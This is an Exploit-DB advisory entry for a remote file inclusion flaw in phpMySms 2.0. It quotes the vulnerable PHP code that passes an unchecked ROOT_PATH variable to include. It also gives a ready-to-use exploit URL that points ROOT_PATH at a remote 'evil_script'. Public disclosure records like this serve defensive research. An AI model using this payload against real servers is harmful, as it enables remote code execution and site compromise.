Lucene search

K
exploitdbPersian-DefacerEDB-ID:1948
HistoryJun 24, 2006 - 12:00 a.m.

phpMySms 2.0 - 'ROOT_PATH' Remote File Inclusion

2006-06-2400:00:00
Persian-Defacer
www.exploit-db.com
24

AI Score

7.4

Confidence

Low

PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability
URL : Http://www.phpmysms.com
 
Author=Persian-Defacer
www.Hacking-Boys.com
==============================================================
if (($_POST[mode] == "1") or ($_GET[mode] == "1")) {
include ("config.php");
} else {
include ("$ROOT_PATH/config.php");
}
==============================================================


Exploit : http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]

# milw0rm.com [2006-06-24]

AI Score

7.4

Confidence

Low

Related for EDB-ID:1948